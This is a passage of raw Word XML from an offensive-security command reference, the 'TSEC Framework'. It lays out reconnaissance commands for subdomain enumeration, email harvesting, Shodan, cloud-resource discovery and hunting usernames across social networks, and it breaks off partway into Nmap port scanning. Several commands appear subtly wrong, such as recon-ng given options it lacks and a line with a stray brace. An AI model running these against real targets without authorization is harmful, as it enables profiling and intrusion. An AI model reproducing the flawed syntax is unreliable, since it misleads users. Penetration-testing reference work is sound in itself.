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d46a7150585bc10433e3e1ea7c002b41ce11e5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TSEC FRAMEWORK — Tactical Security Enumeration &amp; Compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The definitive command-line reference for offensive security operations.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10 Phases | 100 Tools | 1,000 Commands — Every command saves output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Authorized Security Testing Only. Unauthorized access to computer systems is illegal.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af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directory-structure">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Directory Structure</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-1-reconnaissance">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 1: Reconnaissance</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-2-attack-surface-mapping">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 2: Attack Surface Mapping</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-3-vulnerability-assessment">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 3: Vulnerability Assessment</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-4-payload-development--delivery">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 4: Payload Development &amp; Delivery</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-5-privilege-escalation">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 5: Privilege Escalation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-6-credential-access">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 6: Credential Access</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-7-lateral-movement">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 7: Lateral Movement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-8-persistence--defense-evasion">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 8: Persistence &amp; Defense Evasion</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-9-actions-on-objectives">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 9: Actions on Objectives</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="phase-10-wireless-hacking">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Phase 10: Wireless Hacking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="quick-reference-matrix">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Quick Reference Matrix</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="usage-notes">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af"/>
          </w:rPr>
          <w:t xml:space="preserve">Usage Notes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overview"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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TSEC Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a comprehensive, phase-driven command-line toolkit for authorized penetration testing and red team operations. Each phase contains 10 carefully selected tools, and each tool provides 10 operational modes (commands) — ensuring you always have the right command for the job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every command in this framework is designed to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">save output to a designated file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ensuring no data is lost and all findings are properly documented for reporting.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="framework-design"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Framework Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase (1-10) -&gt; Tool (1-10 per phase) -&gt; Mode (1-10 per tool) -&gt; Command</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="key-principles"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key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Pure CLI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Every tool is command-line driven; no GUIs required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 Capture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Every command saves results to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/tsec/output/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Modular Design</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Use phases independently or as a complete kill chain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Living Reference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Commands use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{placeholders}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for easy customization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irectory-structure"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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/opt/tsec/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── output/          # All command outputs (timestamped)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── wordlists/       # Password lists, user lists</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── scripts/         # Custom scripts and payloads</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── configs/         # Tool configuration files</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── tools/           # Installed tool binaries</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└── projects/        # Per-engagement project files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phase-1-reconnaissance"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 1: Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Gather intelligence on targets through passive and active techniques. Map the digital footprint before touching the target infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="26" w:name="tool-1.1-subfinder"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.1 — Subfinder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid passive subdomain discovery using multiple online sources.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Subdomain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subfinder -d {domain} -silent -o /opt/tsec/output/1.1.1_subfinder_passive_{domain}.txt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Sources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subfinder -d {domain} -all -silent -o /opt/tsec/output/1.1.2_subfinder_all_{domain}.txt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Subdomain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subfinder -d {domain} -recursive -all -silent -o /opt/tsec/output/1.1.3_subfinder_recursive_{domain}.txt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+ Wildcard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subfinder -d {domain} -all -nW -silent -o /opt/tsec/output/1.1.4_subfinder_active_{domain}.txt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Sources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subfinder -d {domain} -sources shodan,censys,virustotal,crtsh,github -silent -o /opt/tsec/output/1.1.5_subfinder_sources_{domain}.txt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Collection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subfinder -d {domain} -all -oJ -cs -o /opt/tsec/output/1.1.6_subfinder_json_{domain}.json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Sources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subfinder -d {domain} -all -es {source} -silent -o /opt/tsec/output/1.1.7_subfinder_exclude_{domain}.txt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Resolution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subfinder -d {domain} -all -nW -oI -silent -o /opt/tsec/output/1.1.8_subfinder_ip_{domain}.txt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Domain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subfinder -dL {domain_list_file} -all -silent -o /opt/tsec/output/1.1.9_subfinder_bulk.txt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to HTTPX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subfinder -d {domain} -all -silent \| httpx -silent -sc -title -tech-detect -o /opt/tsec/output/1.1.10_subfinder_httpx_{domain}.txt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26"/>
    <w:bookmarkStart w:id="27" w:name="tool-1.2-amass"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.2 — Amass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive DNS enumeration and network mapping with deep correlation.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Enumeration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enum -passive -d {domain} -o /opt/tsec/output/1.2.1_amass_passive_{domain}.txt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Enumeration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enum -active -d {domain} -o /opt/tsec/output/1.2.2_amass_active_{domain}.txt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-d {domain} -whois -o /opt/tsec/output/1.2.3_amass_intel_{domain}.txt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Enumeration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enum -d {domain} -src -ip -o /opt/tsec/output/1.2.4_amass_dns_{domain}.txt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ASN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-org "{org_name}" -o /opt/tsec/output/1.2.5_amass_asn.txt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enum -brute -d {domain} -w {wordlist} -o /opt/tsec/output/1.2.6_amass_brute_{domain}.txt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viz -d3 -o /opt/tsec/output/1.2.7_amass_viz_{domain}.html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db -names -d {domain} &gt; /opt/tsec/output/1.2.8_amass_db_{domain}.txt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Config-Driven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enum -config /opt/tsec/configs/amass.ini -d {domain} -o /opt/tsec/output/1.2.9_amass_config_{domain}.txt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-active -d {domain} -whois -src -o /opt/tsec/output/1.2.10_amass_full_{domain}.txt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27"/>
    <w:bookmarkStart w:id="28" w:name="tool-1.3-theharvester"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.3 — theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Email harvesting and OSINT gathering from search engines and public sources.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Harvest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theHarvester -d {domain} -b all -f /opt/tsec/output/1.3.1_harvester_full_{domain}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theHarvester -d {domain} -b google -f /opt/tsec/output/1.3.2_harvester_google_{domain}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Bing + LinkedIn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theHarvester -d {domain} -b bing,linkedin -f /opt/tsec/output/1.3.3_harvester_bing_linkedin_{domain}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Shodan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theHarvester -d {domain} -b shodan -f /opt/tsec/output/1.3.4_harvester_shodan_{domain}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theHarvester -d {domain} -b all -l {limit} -f /opt/tsec/output/1.3.5_harvester_limited_{domain}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TLD Expansion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theHarvester -d {domain} -c -f /opt/tsec/output/1.3.6_harvester_tld_{domain}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Host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theHarvester -d {domain} -v -f /opt/tsec/output/1.3.7_harvester_vhost_{domain}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theHarvester -d {domain} -n -f /opt/tsec/output/1.3.8_harvester_dns_{domain}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Takeover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theHarvester -d {domain} -t -f /opt/tsec/output/1.3.9_harvester_takeover_{domain}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theHarvester -d {domain} -b all -p {proxy_url} -f /opt/tsec/output/1.3.10_harvester_proxy_{domain}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HTML/XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="tool-1.4-shodan-cli"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.4 — Shodan CLI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Search engine for internet-connected devices and exposed services.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shodan host {ip} &gt; /opt/tsec/output/1.4.1_shodan_host_{ip}.txt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shodan domain {domain} &gt; /opt/tsec/output/1.4.2_shodan_domain_{domain}.txt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shodan search "{query}" --fields ip_str,port,org,hostnames &gt; /opt/tsec/output/1.4.3_shodan_search.txt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Facet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shodan search "{query}" --facets org,port,os &gt; /opt/tsec/output/1.4.4_shodan_facets.txt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shodan download /opt/tsec/output/1.4.5_shodan_{query} "{query}"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shodan parse --fields ip_str,port,data /opt/tsec/output/1.4.5_shodan_{query}.json.gz &gt; /opt/tsec/output/1.4.6_shodan_parsed.txt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shodan stats "{query}" &gt; /opt/tsec/output/1.4.7_shodan_stats.txt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shodan myip &gt; /opt/tsec/output/1.4.8_shodan_myip.txt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shodan count "{query}" &gt; /opt/tsec/output/1.4.9_shodan_count.txt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Honeyscore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shodan honeyscore {ip} &gt; /opt/tsec/output/1.4.10_shodan_honeyscore_{ip}.txt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29"/>
    <w:bookmarkStart w:id="30" w:name="tool-1.5-recon-ng"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.5 — Recon-ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modular reconnaissance framework with automated correlation.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Recon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recon-ng -r /opt/tsec/scripts/recon-ng-domain.rc -o /opt/tsec/output/1.5.1_reconng_domain_{domain}.txt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Harvest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recon-ng -w {workspace} -m recon/domains-contacts/whois_pocs} -o /opt/tsec/output/1.5.2_reconng_contacts.txt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Enumeration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recon-ng -w {workspace} -m recon/domains-hosts/brute_hosts -o /opt/tsec/output/1.5.3_reconng_hosts.txt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recon-ng -w {workspace} --no-check -C "marketplace search {keyword}" &gt; /opt/tsec/output/1.5.4_reconng_search.txt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recon-ng --no-check -C "marketplace install all" &gt; /opt/tsec/output/1.5.5_reconng_install.txt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Netblock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recon-ng -w {workspace} -m recon/domains-hosts/census_api -o /opt/tsec/output/1.5.6_reconng_netblock.txt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recon-ng -w {workspace} -m recon/domains-hosts/ssl_san -o /opt/tsec/output/1.5.7_reconng_ssl.txt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recon-ng -w {workspace} -m reporting/html -o /opt/tsec/output/1.5.8_reconng_report.html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recon-ng -w {workspace} -m recon/domains-credentials/pwnedlist -o /opt/tsec/output/1.5.9_reconng_creds.txt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recon-ng -r /opt/tsec/scripts/recon-ng-full.rc -o /opt/tsec/output/1.5.10_reconng_full.txt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30"/>
    <w:bookmarkStart w:id="31" w:name="tool-1.6-sherlock"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.6 — Sherlock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hunt down usernames across 400+ social networks.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sherlock {username} --output /opt/tsec/output/1.6.1_sherlock_{username}.txt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sherlock {user1} {user2} {user3} --output /opt/tsec/output/1.6.2_sherlock_multi.txt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sherlock {username} --site instagram,twitter,github --output /opt/tsec/output/1.6.3_sherlock_filtered.txt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sherlock {username} --csv --output /opt/tsec/output/1.6.4_sherlock_{username}.csv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sherlock {username} --json --output /opt/tsec/output/1.6.5_sherlock_{username}.json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sherlock {username} --proxy {proxy_url} --output /opt/tsec/output/1.6.6_sherlock_proxy.txt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Adjust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sherlock {username} --timeout 10 --output /opt/tsec/output/1.6.7_sherlock_timeout.txt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sherlock {username} --print-found --output /opt/tsec/output/1.6.8_sherlock_found.txt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sherlock {username} --browse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Sites +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sherlock {username} --csv --json --output /opt/tsec/output/1.6.10_sherlock_full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31"/>
    <w:bookmarkStart w:id="32" w:name="tool-1.7-spiderfoot"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.7 — SpiderFoot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Automated OSINT and threat intelligence platform.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spiderfoot -s {target} -o /opt/tsec/output/1.7.1_spiderfoot_{target}.json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spiderfoot -M &gt; /opt/tsec/output/1.7.2_spiderfoot_modules.txt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spiderfoot -s {target} -m sfp_dns,sfp_webframework,sfp_portscan_tcp -o /opt/tsec/output/1.7.3_spiderfoot_select.json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spiderfoot -s {target} -n -o /opt/tsec/output/1.7.4_spiderfoot_active.json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Scan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spiderfoot -s {target} -t DNS -o /opt/tsec/output/1.7.5_spiderfoot_dns.json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spiderfoot -s {target} -c -o /opt/tsec/output/1.7.6_spiderfoot_correlation.json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spiderfoot -s {target} -F -o /opt/tsec/output/1.7.7_spiderfoot_names.json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spiderfoot -s {target} -x {proxy} -o /opt/tsec/output/1.7.8_spiderfoot_proxy.json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spiderfoot -s {target} -m sfp_dns,sfp_subdomain -o /opt/tsec/output/1.7.9_spiderfoot_exclude.json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spiderfoot -s {target} -a -c -o /opt/tsec/output/1.7.10_spiderfoot_full.json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32"/>
    <w:bookmarkStart w:id="33" w:name="tool-1.8-owasp-amass-intel-mode"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.8 — OWASP Amass (Intel Mode)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Deep intelligence gathering including ASN, routing, and infrastructure mapping.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ASN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-asn {asn_number} -o /opt/tsec/output/1.8.1_amassintel_asn_{asn}.txt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-cidr {cidr} -o /opt/tsec/output/1.8.2_amassintel_cidr_{cidr}.txt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-org "{org_name}" -o /opt/tsec/output/1.8.3_amassintel_org.txt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WHOIS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-whois -d {domain} -o /opt/tsec/output/1.8.4_amassintel_whois_{domain}.txt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to ASN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-ip -src -o /opt/tsec/output/1.8.5_amassintel_ip.txt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Intel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-active -asn {asn} -o /opt/tsec/output/1.8.6_amassintel_active_{asn}.txt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Scanning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-p 80,443,8080 -cidr {cidr} -o /opt/tsec/output/1.8.7_amassintel_ports_{cidr}.txt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-ipv6 -cidr {cidr} -o /opt/tsec/output/1.8.8_amassintel_ipv6_{cidr}.txt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-src -asn {asn} -o /opt/tsec/output/1.8.9_amassintel_sources_{asn}.txt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Infrastructure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amass intel -active -whois -asn {asn} -cidr {cidr} -org "{org}" -o /opt/tsec/output/1.8.10_amassintel_full.txt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33"/>
    <w:bookmarkStart w:id="34" w:name="tool-1.9-cloud_enum"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.9 — cloud_enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-cloud OSINT tool for finding public resources in AWS, Azure, and GCP.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cloud_enum.py --keyword {keyword} -qs --json /opt/tsec/output/1.9.1_cloudenum_aws_{keyword}.json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cloud_enum.py --keyword {keyword} --azure -qs --json /opt/tsec/output/1.9.2_cloudenum_azure_{keyword}.json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cloud_enum.py --keyword {keyword} --gcp -qs --json /opt/tsec/output/1.9.3_cloudenum_gcp_{keyword}.json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Clouds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cloud_enum.py --keyword {keyword} --all -qs --json /opt/tsec/output/1.9.4_cloudenum_all_{keyword}.json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Brute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cloud_enum.py --keyword {keyword} --dns-brute -qs --json /opt/tsec/output/1.9.5_cloudenum_dns_{keyword}.json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cloud_enum.py --keyword {keyword} -m /opt/tsec/wordlists/cloud_mutations.txt -qs --json /opt/tsec/output/1.9.6_cloudenum_mutations_{keyword}.json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cloud_enum.py --keyword {keyword} -l /opt/tsec/wordlists/s3_regions.txt -qs --json /opt/tsec/output/1.9.7_cloudenum_s3_{keyword}.json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cloud_enum.py --keyword {keyword} --container -qs --json /opt/tsec/output/1.9.8_cloudenum_container_{keyword}.json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cloud_enum.py --keyword {keyword} --functions -qs --json /opt/tsec/output/1.9.9_cloudenum_functions_{keyword}.json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Multi-Cloud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cloud_enum.py --keyword {keyword} --all -m /opt/tsec/wordlists/cloud_mutations.txt -qs --json /opt/tsec/output/1.9.10_cloudenum_full_{keyword}.json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34"/>
    <w:bookmarkStart w:id="35" w:name="tool-1.10-maigret"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 1.10 — Maigret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced username investigation across 3000+ sites with rich data export.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maigret {username} --json /opt/tsec/output/1.10.1_maigret_{username}.json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maigret {username} --html /opt/tsec/output/1.10.2_maigret_{username}.html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maigret {username} --csv /opt/tsec/output/1.10.3_maigret_{username}.csv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maigret {username} --site instagram,twitter,reddit --json /opt/tsec/output/1.10.4_maigret_filtered.json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maigret {username} --tags photo,messaging --json /opt/tsec/output/1.10.5_maigret_tags.json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Sites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maigret {username} --top-sites --json /opt/tsec/output/1.10.6_maigret_top.json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maigret {username} --proxy {proxy} --json /opt/tsec/output/1.10.7_maigret_proxy.json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Adjust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maigret {username} --timeout 15 --json /opt/tsec/output/1.10.8_maigret_timeout.json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maigret {username} --no-recheck --json /opt/tsec/output/1.10.9_maigret_nocheck.json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Investigation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maigret {username} --all-sites --timeout 20 --json /opt/tsec/output/1.10.10_maigret_full_{username}.json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7" w:name="phase-2-attack-surface-mapping"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 2: Attack Surface Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Map the complete attack surface of the target infrastructure. Identify all services, ports, technologies, and entry points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="tool-2.1-nmap"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.1 — Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The network mapper — the foundation of network discovery and security auditing.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-T4 -F {target} -oN /opt/tsec/output/2.1.1_nmap_quick_{target}.nmap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Port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-p- -T4 {target} -oN /opt/tsec/output/2.1.2_nmap_fullport_{target}.nmap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-sV -sC -O {target} -oN /opt/tsec/output/2.1.3_nmap_service_{target}.nmap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-A -T4 {target} -oN /opt/tsec/output/2.1.4_nmap_aggressive_{target}.nmap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-sU -T4 --top-ports 100 {target} -oN /opt/tsec/output/2.1.5_nmap_udp_{target}.nmap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--script={script_name} {target} -oN /opt/tsec/output/2.1.6_nmap_script_{target}.nmap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-sS -T2 -p- {target} -oN /opt/tsec/output/2.1.7_nmap_stealth_{target}.nmap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-O --osscan-guess {target} -oN /opt/tsec/output/2.1.8_nmap_os_{target}.nmap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-A -T4 {target} -oX /opt/tsec/output/2.1.9_nmap_{target}.xml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nmap -sS -sV -sC -O -A -p- -T4 {target} -oA /opt/tsec/output/2.1.10_nmap_full_{target}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37"/>
    <w:bookmarkStart w:id="38" w:name="tool-2.2-rustscan"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.2 — RustScan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
